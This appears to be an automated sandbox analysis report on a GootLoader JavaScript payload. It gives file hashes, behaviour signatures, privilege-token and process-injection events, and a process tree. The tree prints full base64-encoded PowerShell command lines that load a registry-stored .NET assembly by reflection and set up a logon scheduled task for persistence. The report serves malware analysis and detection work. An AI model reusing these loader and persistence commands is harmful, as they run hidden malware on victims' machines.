fe7b2838f5a5cf6b943301c4087d9f9038bb39eddbb453cd5b419f4e09bc3b7d

Analysis

max time kernel
137s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
20/10/2022, 13:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

gootloader-payload.js
Size

507KB
MD5

7f8d06ef42e2c6c948269ce6596269ac
SHA1

ba671f89682e5dd24c714222309a88c0ac89d57c
SHA256

fe7b2838f5a5cf6b943301c4087d9f9038bb39eddbb453cd5b419f4e09bc3b7d
SHA512

9dbaeb23d06aa06f7376027b2766a32ab5c0f0932970f8bfcba4d3258547f9a4bdbf13338fee610d041c1c88c3bcd424b6d3c8abb54636357afe312d6a9e9345
SSDEEP

12288:hC+4odILiIoJUzbxA5ITh8QSm/kqQqvw8Hg38:h14oy/oezbxSITyZ9qQqvpg38

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
37	404	powershell.exe
39	404	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1236	powershell.exe
5028	powershell.exe
5028	powershell.exe
1236	powershell.exe
404	powershell.exe
2100	powershell.exe
404	powershell.exe
2100	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1236	powershell.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeDebugPrivilege	404	powershell.exe
Token: SeIncreaseQuotaPrivilege	2100	powershell.exe
Token: SeSecurityPrivilege	2100	powershell.exe
Token: SeTakeOwnershipPrivilege	2100	powershell.exe
Token: SeLoadDriverPrivilege	2100	powershell.exe
Token: SeSystemProfilePrivilege	2100	powershell.exe
Token: SeSystemtimePrivilege	2100	powershell.exe
Token: SeProfSingleProcessPrivilege	2100	powershell.exe
Token: SeIncBasePriorityPrivilege	2100	powershell.exe
Token: SeCreatePagefilePrivilege	2100	powershell.exe
Token: SeBackupPrivilege	2100	powershell.exe
Token: SeRestorePrivilege	2100	powershell.exe
Token: SeShutdownPrivilege	2100	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeSystemEnvironmentPrivilege	2100	powershell.exe
Token: SeRemoteShutdownPrivilege	2100	powershell.exe
Token: SeUndockPrivilege	2100	powershell.exe
Token: SeManageVolumePrivilege	2100	powershell.exe
Token: 33	2100	powershell.exe
Token: 34	2100	powershell.exe
Token: 35	2100	powershell.exe
Token: 36	2100	powershell.exe
Token: SeIncreaseQuotaPrivilege	2100	powershell.exe
Token: SeSecurityPrivilege	2100	powershell.exe
Token: SeTakeOwnershipPrivilege	2100	powershell.exe
Token: SeLoadDriverPrivilege	2100	powershell.exe
Token: SeSystemProfilePrivilege	2100	powershell.exe
Token: SeSystemtimePrivilege	2100	powershell.exe
Token: SeProfSingleProcessPrivilege	2100	powershell.exe
Token: SeIncBasePriorityPrivilege	2100	powershell.exe
Token: SeCreatePagefilePrivilege	2100	powershell.exe
Token: SeBackupPrivilege	2100	powershell.exe
Token: SeRestorePrivilege	2100	powershell.exe
Token: SeShutdownPrivilege	2100	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeSystemEnvironmentPrivilege	2100	powershell.exe
Token: SeRemoteShutdownPrivilege	2100	powershell.exe
Token: SeUndockPrivilege	2100	powershell.exe
Token: SeManageVolumePrivilege	2100	powershell.exe
Token: 33	2100	powershell.exe
Token: 34	2100	powershell.exe
Token: 35	2100	powershell.exe
Token: 36	2100	powershell.exe
Token: SeIncreaseQuotaPrivilege	2100	powershell.exe
Token: SeSecurityPrivilege	2100	powershell.exe
Token: SeTakeOwnershipPrivilege	2100	powershell.exe
Token: SeLoadDriverPrivilege	2100	powershell.exe
Token: SeSystemProfilePrivilege	2100	powershell.exe
Token: SeSystemtimePrivilege	2100	powershell.exe
Token: SeProfSingleProcessPrivilege	2100	powershell.exe
Token: SeIncBasePriorityPrivilege	2100	powershell.exe
Token: SeCreatePagefilePrivilege	2100	powershell.exe
Token: SeBackupPrivilege	2100	powershell.exe
Token: SeRestorePrivilege	2100	powershell.exe
Token: SeShutdownPrivilege	2100	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeSystemEnvironmentPrivilege	2100	powershell.exe
Token: SeRemoteShutdownPrivilege	2100	powershell.exe
Token: SeUndockPrivilege	2100	powershell.exe
Token: SeManageVolumePrivilege	2100	powershell.exe
Token: 33	2100	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 368 wrote to memory of 1236	368	wscript.exe	81
PID 368 wrote to memory of 1236	368	wscript.exe	81
PID 368 wrote to memory of 1236	368	wscript.exe	81
PID 368 wrote to memory of 5028	368	wscript.exe	82
PID 368 wrote to memory of 5028	368	wscript.exe	82
PID 368 wrote to memory of 5028	368	wscript.exe	82
PID 1236 wrote to memory of 404	1236	powershell.exe	86
PID 1236 wrote to memory of 404	1236	powershell.exe	86
PID 1236 wrote to memory of 404	1236	powershell.exe	86
PID 5028 wrote to memory of 2100	5028	powershell.exe	87
PID 5028 wrote to memory of 2100	5028	powershell.exe	87
PID 5028 wrote to memory of 2100	5028	powershell.exe	87

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\gootloader-payload.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:368
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /co C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "/"enc" N"A"A"3A"D"kAMwA2ADMAN"gA5ADAAOw"Bz"AGwA"ZQBlAHAA"IAAtAHMAIA"A3"A"DgAO"w"AkAGkAaQBz"AD0ARwB"lAHQ"ALQBJAH"QA"ZQBt"AFAAcgBvAHA"AZ"Q"ByAHQAeQAgAC0A"cABhAHQAaAAgACgAIg"B"oAGsAIg"A"r"ACIA"Y"wB1"ADoAXAB"z"AG8A"ZgAi"A"C"s"AIg"B0AH"cAIg"ArA"CI"AYQByA"GUAX"ABt"A"GkA"YwA"iACsA"IgByAG"8Acw"Ai"ACsAI"gBvAGYAdA"BcAFA"A"ZQBy"AC"IA"KwAiA"HMAbwBuAG"EAbAB"p"A"H"oAIgArACIAYQ"B0A"Gk"AbwBuAFwAIgA"r"AF"sARQB"uAHYA"aQ"ByA"G8Ab"gB"tA"GUAb"gB0AF0AOgA6A"C"gAIgB1"A"H"MA"Z"QAiA"C"sA"Ig"By"AG4AI"g"ArA"C"IA"YQBt"A"G"U"A"IgAp"A"Cs"AI"g"A"wACIAK"QA"7AGY"AbwByACAA"KAAkAG"MAbQA9"ADAA"Ow"Ak"A"G"MA"bQAgAC"0A"bA"BlACAAOAAwADA"AOwAkAGMAb"QArACsAK"QB7"AF"QAcgB"5A"HsAJAB2"AGQAKwA9"ACQ"AaQBpAHM"ALgAkAGMAbQ"B9AE"MAY"QB0AGM"AaAB7AH0A"f"Q"A7ACQAYwB"t"AD0AMAA7AHcAaAB"pAGwAZQA"oACQAd"AByA"HU"AZQApA"HsAJABj"A"G"0"AKwArADsAJ"A"BrA"G8"APQBbAG0AYQ"B0A"G"gAXQA"6ADoA"KAAiAHMAcQA"iACs"AIg"By"AHQAIg"ApA"Cg"AJA"BjA"G0AKQ"A"7AGkAZgAo"ACQAaw"BvACAAL"QBl"AHE"AIAAxADAAMA"AwA"CkAewB"i"AHIAZ"QBhAGsAfQ"B9"ACQAegBlAGwAPQAkAH"YAZAAuA"HIAZQBw"AG"wA"YQBjA"GUAK"AAi"ACMA"Ig"As"ACQAawBv"ACkAOwAkAHoAeQB1"AD0AWwB"iAHkA"dABl"AFsAX"Q"BdADoAOgAoA"C"I"AbgB"lA"CIAK"wA"iAHcA"IgApACgAJAB6AGUAbA"AuAE"wA"ZQBuAGcAdABoAC8AMgA"pADsAZgBvA"H"IAKAAkAGMAbQ"A9ADAA"OwAkAG"M"AbQAgAC0Ab"A"B0A"CAAJAB6AGUAbAAuA"Ew"AZ"QB"uAGcAdA"BoAD"sA"JABjAG0AKwA9ADIA"K"Q"B7"ACQAe"gB5"A"HU"AWwAkA"G"MAbQAvADIA"XQ"A9AFs"AYwB"vAG4AdgBlA"HIAdABdADoAOgAoACIAV"ABvAEIAIgArACIAeQB0AG"UAIg"ApAC"gAJAB6AGUAbA"A"uA"FMAdQ"Bi"A"HMA"dAByAGkAbgBnA"Cg"AJABjAG0"ALAAy"ACkALAAoADIA"KgA4AC"kAKQB9AFsAc"gBlAGYA"b"ABlAGM"Ad"ABp"AG8AbgA"uAGEA"cwB"zAGUAbQ"B"iAG"wAeQB"d"A"D"oA"OgAo"AC"I"ATABvAC"IAKwAi"AGEAZAAiAC"kA"KA"A"kAHoAeQB1ACkA"O"w"BbAE8AcABlAG4"AXQA6ADoA"K"AA"iAFQAZQAiA"C"sAIg"BzAHQA"Ig"ApACg"AKQA7A"DUA"N"gA0AD"gAMQ"A0ADMAMQ"A1ADsA"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1236
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /enc NAA3ADkAMwA2ADMANgA5ADAAOwBzAGwAZQBlAHAAIAAtAHMAIAA3ADgAOwAkAGkAaQBzAD0ARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACgAIgBoAGsAIgArACIAYwB1ADoAXABzAG8AZgAiACsAIgB0AHcAIgArACIAYQByAGUAXABtAGkAYwAiACsAIgByAG8AcwAiACsAIgBvAGYAdABcAFAAZQByACIAKwAiAHMAbwBuAGEAbABpAHoAIgArACIAYQB0AGkAbwBuAFwAIgArAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6ACgAIgB1AHMAZQAiACsAIgByAG4AIgArACIAYQBtAGUAIgApACsAIgAwACIAKQA7AGYAbwByACAAKAAkAGMAbQA9ADAAOwAkAGMAbQAgAC0AbABlACAAOAAwADAAOwAkAGMAbQArACsAKQB7AFQAcgB5AHsAJAB2AGQAKwA9ACQAaQBpAHMALgAkAGMAbQB9AEMAYQB0AGMAaAB7AH0AfQA7ACQAYwBtAD0AMAA7AHcAaABpAGwAZQAoACQAdAByAHUAZQApAHsAJABjAG0AKwArADsAJABrAG8APQBbAG0AYQB0AGgAXQA6ADoAKAAiAHMAcQAiACsAIgByAHQAIgApACgAJABjAG0AKQA7AGkAZgAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewBiAHIAZQBhAGsAfQB9ACQAegBlAGwAPQAkAHYAZAAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAOwAkAHoAeQB1AD0AWwBiAHkAdABlAFsAXQBdADoAOgAoACIAbgBlACIAKwAiAHcAIgApACgAJAB6AGUAbAAuAEwAZQBuAGcAdABoAC8AMgApADsAZgBvAHIAKAAkAGMAbQA9ADAAOwAkAGMAbQAgAC0AbAB0ACAAJAB6AGUAbAAuAEwAZQBuAGcAdABoADsAJABjAG0AKwA9ADIAKQB7ACQAegB5AHUAWwAkAGMAbQAvADIAXQA9AFsAYwBvAG4AdgBlAHIAdABdADoAOgAoACIAVABvAEIAIgArACIAeQB0AGUAIgApACgAJAB6AGUAbAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABjAG0ALAAyACkALAAoADIAKgA4ACkAKQB9AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvACIAKwAiAGEAZAAiACkAKAAkAHoAeQB1ACkAOwBbAE8AcABlAG4AXQA6ADoAKAAiAFQAZQAiACsAIgBzAHQAIgApACgAKQA7ADUANgA0ADgAMQA0ADMAMQA1ADsA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:404
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /co C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "/"enc" NQA3ADgA"O"A"A4A"DMANQA4AD"gAOw"A"kA"G4A"e"A"A"9ACg"AWw"BEA"Gk"AYQBnA"G4"Ab"wBzA"HQAaQBjA"HM"ALgBQAHIAb"w"BjA"G"U"AcwBzAF0AOgA6A"E"cA"ZQ"B0"AEM"AdQB"yAHIAZ"QBuAHQA"UAByA"G8AYwB"lAHMAc"wAoA"CkALgBNAG"E"Aa"QBuA"E0"A"bwBkAH"UAbABlAC4A"RgBpA"GwA"Z"QB"OAGE"A"bQBlAC"kAOwAk"AHYAbQBwAD0A"IgAt"AHcAIABoAC"AA"Lw"BjA"C"AAIgArACQ"AbgB"4A"C"sAIgAgACIAIgAvACIAI"gBlACIAIgAg"A"E"4AQQBBADMAQ"QBEAGsAQQBNAHcAQQAyAEEARABNAE"EATgBnA"EEANQB"BAEQ"AQ"QBBAE8"AdwBCA"Ho"AQQB"HAHcAQ"Q"BaAFEAQgBsA"EE"AS"ABBAEE"ASQB"BAEEA"dABBAEgATQBB"A"E"kAQ"QBB"ADMAQQB"EAGcAQQBP"A"HcAQQBrA"EEARwBrAEEAYQBR"A"EIAeg"BBA"E"Q"AMABBAF"IAdwBCA"GwAQ"QBI"AF"EA"QQ"BM"AFEAQgBKAEEASABRAEEAWgB"RAEIA"dABBAEYAQQBBAGMAZw"B"CA"HYAQQBIAEEA"QQBa"AF"EAQgB5AEEA"SA"BRAEEAZQ"BRAEE"A"Z"wBB"A"EMA"MABBAGM"AQQ"BCA"GgAQ"QBIAFEA"Q"QBhAEEAQQ"B"nAEEAQwBnAEEASQBnAEIAb"wBBA"Ec"AcwBBAEkAZwB"B"AHI"AQQB"D"AE"k"AQQ"BZAHcA"QgAxAEEARABvAEEAWABBA"E"I"A"egBBAEcAOABBAFoAZwBBAG"kAQQ"BDAH"M"A"QQBJAGcAQgAw"AEEA"SAB"jAEEASQ"BnAEEAcgB"BAEM"A"SQBBAF"kA"UQBCA"HkAQQ"B"HAFUAQQBY"AEEAQgB"0A"EEARw"Br"AEE"AW"QB"3"AEEAaQB"BAE"MAcwBBAEk"AZwBCAH"kAQQBHADgAQ"QBjAHc"AQQBp"AEEA"Q"wBzAEE"A"S"QBn"A"EIAd"gB"BAEcAW"Q"B"BAGQAQ"QBCAGM"A"QQ"BGAEEAQQBaA"FEAQ"gB"5"AEEA"QwBJ"AE"EASwB3AE"EAa"Q"BBAEgATQBBA"GIAd"wBCA"HUAQQBHAEUAQQBiAEEA"Q"g"Bw"AEEASA"BvA"EEASQ"BnAE"EAcgBBAEM"ASQBBAFkAUQBCA"DAAQ"QBHAGs"AQQB"iA"H"cAQgB1AEEARgB3"AE"EASQB"nAEE"Acg"B"BA"EY"A"cw"BBAFIAUQB"C"AHU"AQQ"BI"A"F"k"AQQ"Bh"AF"EAQgB5AEE"ARw"A4A"EEA"YgBnAEIAdABBAEcAVQBBA"GIAZwB"CA"DAAQQBGADAA"QQBPAGcAQ"QA2AEE"AQwBnAE"EAS"QB"nAEI"AMQBBAEgATQBBAFo"AUQB"BAGkAQQBDAHM"AQ"QB"JAGcAQg"B5"A"E"E"ARw"A"0AEEA"S"QBn"AEEAcgB"BAEMAS"QBBAFkAUQBCA"H"QAQ"QBHAFUAQQBJ"AGcAQQBwAEEAQwBzA"EEA"SQBn"AE"EA"d"wBBA"EMASQBBAEsAUQBBA"D"cAQQ"BHA"FkA"QQ"BiAH"cAQgB5AEEAQ"w"BBAEE"AS"wBBAEEAa"wBBA"EcATQBBA"GIAUQBB"A"D"kAQ"QB"EAEEAQQBPAHcAQQBr"A"EEARwBNAEEAYgBRA"EE"AZwBBA"EMAM"ABBA"GIA"QQBCAGwAQQBDA"EEAQQBP"AEE"AQQB3AEE"ARABBAEEAT"w"B3"AEEA"awBBAEcA"TQBBA"GIAUQBBAH"I"AQQB"DAH"M"AQQB"LAFE"AQg"A3AEEAR"gB"R"AE"EAYwBnAE"IANQBBAEgAc"wBBAEoA"QQBCADIAQQBHAFEA"QQBLAHcAQ"QA5"AE"EAQwBRA"EEAYQ"B"RAEIAc"ABBAE"gAT"QBBA"EwAZw"BBAGsAQ"QBH"AE0A"QQBiAFEAQgA5AEEARQBNAEEA"WQBRAEIAMABBAEcAT"QBB"AG"EAQQ"BCADcA"Q"Q"BI"A"D"AAQQBmAF"EAQQ"A3A"E"E"AQwB"RAEEAW"QB3AEIAd"ABBAEQ"AM"ABB"AE0AQQBBADcA"QQBIA"GMA"QQBhAEE"A"Qg"BwAEE"ARwB3A"EEAWgBRA"EEAb"w"B"B"AEM"AUQB"BAG"QAQQBCAH"kAQQBIAFUAQ"QBaA"FE"A"Q"QBwA"EEASA"Bz"AEEAS"gBBA"EIA"agBBA"EcAMABBAEs"Ad"w"BBAHIAQQBEAHMAQQBK"A"E"EAQgByAEEARwA4AEEAU"ABR"A"EIAYgB"BA"Ec"AMAB"BAFkAUQB"C"ADAAQQBHAGcAQQBYAFEAQQA2"AEEA"RA"BvAEEASw"BBA"EEAaQ"BBAEgATQBBAGMAU"QBBAG"kAQQBDAHMAQ"QBJAGcAQg"B5"AEEAS"ABRA"EEASQBnA"EEAcABB"AEMAZwBBA"Eo"AQQBCAGo"A"Q"QBHAD"A"A"QQBL"AFEAQQA3AEE"AR"wBrAEEAWgBn"AEEAbw"BB"A"E"MA"U"Q"BBAGEAdwBC"AH"Y"AQQB"DAE"E"AQ"Q"BMA"F"EAQgBsAEE"A"S"ABF"AE"EASQBBAEEAeABB"A"EQA"QQ"BB"A"E0"AQQBBAHcAQQBDAGs"AQQ"BlAHcAQgBpAE"EASA"BJAEEAWgBR"AEIA"aABBAEcAcwBB"AGYA"UQBCAD"k"AQQBDAF"EAQQBl"AGc"AQgBsAE"EARwB3AEEAUAB"RAEEAawBBAE"gAWQBBA"FoAQQBBAHUA"QQBIAEkAQQBa"AFEAQg"B3AEEA"R"wB3AEE"AWQB"RAE"IA"agB"BAEc"A"VQ"BBA"E"sA"QQ"BB"AGkAQQ"BDA"E0AQ"Q"BJ"A"Gc"AQQBzAEEAQwBRAEEAYQB3A"EI"Ad"gBBAEMA"awBBAE8AdwBBA"GsA"QQBIAG8AQ"QBlAF"EAQ"g"A"xA"EEARAAwAEEAV"wB3AEIAaQBBAEgAawB"BAGQAQ"QBCAG"wAQ"QB"GAHMA"QQB"YAFEAQgBkAE"EA"RA"B"v"AEEATwB"nAEEAbwBBA"EMASQ"BBAG"IAZwBCAGwAQQBDAEkAQQBLAH"cAQ"QBp"AEEASABjA"EE"AS"QBnA"EEAcABBAEMA"ZwBBAE"oA"QQ"BC"ADY"A"QQBHAFUA"QQ"BiAEEAQ"Q"B1A"EEARQB3AEEAWg"BRA"EIA"dQ"BBAEcAYwBB"AG"QAQQBCAG8AQQB"DA"DgAQQBN"A"G"c"AQQB"wA"EE"ARABzAEEAWgBnAEI"AdgBBA"E"gASQBBAEsAQ"QBB"AGsA"Q"QBHAE"0AQQ"BiAFEAQQA5AEEARABBAE"EA"T"wB3A"EEAawB"BAE"cAT"QBB"AGI"AUQBBAG"cAQQB"DADAAQQ"Bi"A"EEAQgAwAEEAQ"wBBAEEASgB"BAEIANgBBAEcAVQBBAGIAQQ"BBAHUAQQBF"A"HcAQQ"Ba"A"FEAQgB1AEEARwBjA"EEAZ"A"BBAEI"Ab"wBBA"EQAcw"BBAE"oAQ"QBCAGoAQQBHA"DAAQQB"LAHcAQQ"A5"AEEARABJAEEAS"wB"RAEI"ANw"BBA"EMAUQBBAGU"AZ"wBCA"DUAQQBIAF"UAQ"QBXA"HcAQQB"rAEEARw"BN"AEEAY"g"BRAEEAdg"B"B"AEQA"S"QBBA"FgAU"QBBADkAQQBG"AHM"AQQBZAHcAQg"B2AEEA"R"wA0"AEEAZABnA"EIAbA"B"BAEg"A"S"Q"B"BAGQAQQ"BCAG"QA"QQBE"A"G"8AQQBPAGcAQQBvAEEAQ"wBJ"AEEA"VgBBAEIA"dgBBAEU"ASQBBAEkAZwBBAHIA"Q"QBDAEkAQ"QBlAFEAQgAwAE"EAR"wBVAE"EAS"QBnA"EEAcABB"AE"MAZwBBAEoAQQBCADYAQQB"HAFUA"QQBiAEEAQ"QB"1A"E"EARg"BNAE"EAZAB"R"A"EIAa"QBBAEgATQ"BBAGQAQQBC"AHk"AQ"QBHAGsA"QQBi"AG"cAQ"gB"u"AEEAQw"BnAE"EA"SgBBAEI"Aa"gBBAEcAMABBAEwA"QQB"BAH"k"AQ"QBD"A"GsAQQ"BMAEEA"Q"QBv"A"EEAR"A"B"JA"E"EAS"wBnA"EEANABBAEMA"aw"BB"AEs"A"UQ"BCAD"k"AQQ"BG"AHMAQQBjAGcAQgBsAEEARwBZAEEAYgBBAEIAbABBAEcATQB"BA"GQAQQBCAHAA"Q"QBHADgAQ"QBiA"GcAQQ"B1AE"EARwBFAEEAY"wB3AE"IAeg"BBAE"cAV"QBBA"G"I"AUQB"CAG"k"AQQ"BHAHcAQQB"lAFEA"Q"gBkAE"EA"R"ABvAEEATwBnA"E"EAb"w"BBAEM"ASQBBAFQA"QQBCA"HYAQ"QBDAEkAQ"QBLAHcA"QQBpAEE"ARwBFAE"EAW"gBBAE"EAaQBB"AE"MAawB"BAEsAQQBBA"GsAQQBIAG"8AQQBlAFEA"Qg"AxA"EEAQwB"r"AEEATwB3"A"EIAYgBBAEUAOAB"BAGMAQQBCAG"w"AQ"Q"BHADQA"QQB"Y"A"F"EA"QQA2"A"EEARABvAEEASwBB"AEEAaQBBAEYAUQB"BAFo"AUQ"BB"A"GkAQQBDA"HMAQQBJAGcAQgB6"AEEASABRAEEASQBn"AEEAcABBAEM"A"Z"wBB"AEsAUQ"B"BA"D"cAQQ"BEA"FUA"Q"QBOAGcAQQAwA"EEARABnAEEATQBRAEEAMABB"AEQATQBBAE0"A"UQBBADE"AQQBEAHMAQQ"AiADsA"JA"B"4AHEAe"gA9"ACQA"ZQBuAHY"AO"gBVAFMARQBSAE4"AQQBNAE"UAO"wBSAGUA"ZwBpAHMAdABlAH"IA"LQBTAGMAaAB"lAGQ"A"d"Q"BsAG"UA"ZABU"AGEAcwBrAC"AAJAB4AHEAegAgAC0ASQBu"ACAA"KA"BOA"G"U"A"dwAtAFMAYwBoAGUA"Z"A"B1AG"w"AZQB"kAFQAY"QBzAGsAIAAtAEE"A"YwAgACg"AT"gBlAHcAL"QBTAG"MA"aA"B"lAGQAd"QBs"AGUAZ"ABUAG"EAcwBrAEEAYwB0AGkA"bwBuA"CAALQBF"ACAAJAB"uAH"gAIA"AtAEEAcgAgACQAdgBtAHAAKQAgAC0AV"ABy"ACAA"KA"BO"AGUAdwAtAFM"AYwBoAGUAZAB1AG"w"A"Z"QBkAFQA"YQ"BzAG"sAVABy"A"GkAZwB"nAGU"A"cgAgA"C"0AQQB0AEwAIAAtAF"UAIA"A"kAHgA"cQB"6AC"kAK"Q"A7ADgAM"QA"1ADkANwA3ADI"A"Nw"A0ADs"A
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5028
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /enc NQA3ADgAOAA4ADMANQA4ADgAOwAkAG4AeAA9ACgAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkAOwAkAHYAbQBwAD0AIgAtAHcAIABoACAALwBjACAAIgArACQAbgB4ACsAIgAgACIAIgAvACIAIgBlACIAIgAgAE4AQQBBADMAQQBEAGsAQQBNAHcAQQAyAEEARABNAEEATgBnAEEANQBBAEQAQQBBAE8AdwBCAHoAQQBHAHcAQQBaAFEAQgBsAEEASABBAEEASQBBAEEAdABBAEgATQBBAEkAQQBBADMAQQBEAGcAQQBPAHcAQQBrAEEARwBrAEEAYQBRAEIAegBBAEQAMABBAFIAdwBCAGwAQQBIAFEAQQBMAFEAQgBKAEEASABRAEEAWgBRAEIAdABBAEYAQQBBAGMAZwBCAHYAQQBIAEEAQQBaAFEAQgB5AEEASABRAEEAZQBRAEEAZwBBAEMAMABBAGMAQQBCAGgAQQBIAFEAQQBhAEEAQQBnAEEAQwBnAEEASQBnAEIAbwBBAEcAcwBBAEkAZwBBAHIAQQBDAEkAQQBZAHcAQgAxAEEARABvAEEAWABBAEIAegBBAEcAOABBAFoAZwBBAGkAQQBDAHMAQQBJAGcAQgAwAEEASABjAEEASQBnAEEAcgBBAEMASQBBAFkAUQBCAHkAQQBHAFUAQQBYAEEAQgB0AEEARwBrAEEAWQB3AEEAaQBBAEMAcwBBAEkAZwBCAHkAQQBHADgAQQBjAHcAQQBpAEEAQwBzAEEASQBnAEIAdgBBAEcAWQBBAGQAQQBCAGMAQQBGAEEAQQBaAFEAQgB5AEEAQwBJAEEASwB3AEEAaQBBAEgATQBBAGIAdwBCAHUAQQBHAEUAQQBiAEEAQgBwAEEASABvAEEASQBnAEEAcgBBAEMASQBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEARgB3AEEASQBnAEEAcgBBAEYAcwBBAFIAUQBCAHUAQQBIAFkAQQBhAFEAQgB5AEEARwA4AEEAYgBnAEIAdABBAEcAVQBBAGIAZwBCADAAQQBGADAAQQBPAGcAQQA2AEEAQwBnAEEASQBnAEIAMQBBAEgATQBBAFoAUQBBAGkAQQBDAHMAQQBJAGcAQgB5AEEARwA0AEEASQBnAEEAcgBBAEMASQBBAFkAUQBCAHQAQQBHAFUAQQBJAGcAQQBwAEEAQwBzAEEASQBnAEEAdwBBAEMASQBBAEsAUQBBADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcATQBBAGIAUQBBADkAQQBEAEEAQQBPAHcAQQBrAEEARwBNAEEAYgBRAEEAZwBBAEMAMABBAGIAQQBCAGwAQQBDAEEAQQBPAEEAQQB3AEEARABBAEEATwB3AEEAawBBAEcATQBBAGIAUQBBAHIAQQBDAHMAQQBLAFEAQgA3AEEARgBRAEEAYwBnAEIANQBBAEgAcwBBAEoAQQBCADIAQQBHAFEAQQBLAHcAQQA5AEEAQwBRAEEAYQBRAEIAcABBAEgATQBBAEwAZwBBAGsAQQBHAE0AQQBiAFEAQgA5AEEARQBNAEEAWQBRAEIAMABBAEcATQBBAGEAQQBCADcAQQBIADAAQQBmAFEAQQA3AEEAQwBRAEEAWQB3AEIAdABBAEQAMABBAE0AQQBBADcAQQBIAGMAQQBhAEEAQgBwAEEARwB3AEEAWgBRAEEAbwBBAEMAUQBBAGQAQQBCAHkAQQBIAFUAQQBaAFEAQQBwAEEASABzAEEASgBBAEIAagBBAEcAMABBAEsAdwBBAHIAQQBEAHMAQQBKAEEAQgByAEEARwA4AEEAUABRAEIAYgBBAEcAMABBAFkAUQBCADAAQQBHAGcAQQBYAFEAQQA2AEEARABvAEEASwBBAEEAaQBBAEgATQBBAGMAUQBBAGkAQQBDAHMAQQBJAGcAQgB5AEEASABRAEEASQBnAEEAcABBAEMAZwBBAEoAQQBCAGoAQQBHADAAQQBLAFEAQQA3AEEARwBrAEEAWgBnAEEAbwBBAEMAUQBBAGEAdwBCAHYAQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeABBAEQAQQBBAE0AQQBBAHcAQQBDAGsAQQBlAHcAQgBpAEEASABJAEEAWgBRAEIAaABBAEcAcwBBAGYAUQBCADkAQQBDAFEAQQBlAGcAQgBsAEEARwB3AEEAUABRAEEAawBBAEgAWQBBAFoAQQBBAHUAQQBIAEkAQQBaAFEAQgB3AEEARwB3AEEAWQBRAEIAagBBAEcAVQBBAEsAQQBBAGkAQQBDAE0AQQBJAGcAQQBzAEEAQwBRAEEAYQB3AEIAdgBBAEMAawBBAE8AdwBBAGsAQQBIAG8AQQBlAFEAQgAxAEEARAAwAEEAVwB3AEIAaQBBAEgAawBBAGQAQQBCAGwAQQBGAHMAQQBYAFEAQgBkAEEARABvAEEATwBnAEEAbwBBAEMASQBBAGIAZwBCAGwAQQBDAEkAQQBLAHcAQQBpAEEASABjAEEASQBnAEEAcABBAEMAZwBBAEoAQQBCADYAQQBHAFUAQQBiAEEAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDADgAQQBNAGcAQQBwAEEARABzAEEAWgBnAEIAdgBBAEgASQBBAEsAQQBBAGsAQQBHAE0AQQBiAFEAQQA5AEEARABBAEEATwB3AEEAawBBAEcATQBBAGIAUQBBAGcAQQBDADAAQQBiAEEAQgAwAEEAQwBBAEEASgBBAEIANgBBAEcAVQBBAGIAQQBBAHUAQQBFAHcAQQBaAFEAQgB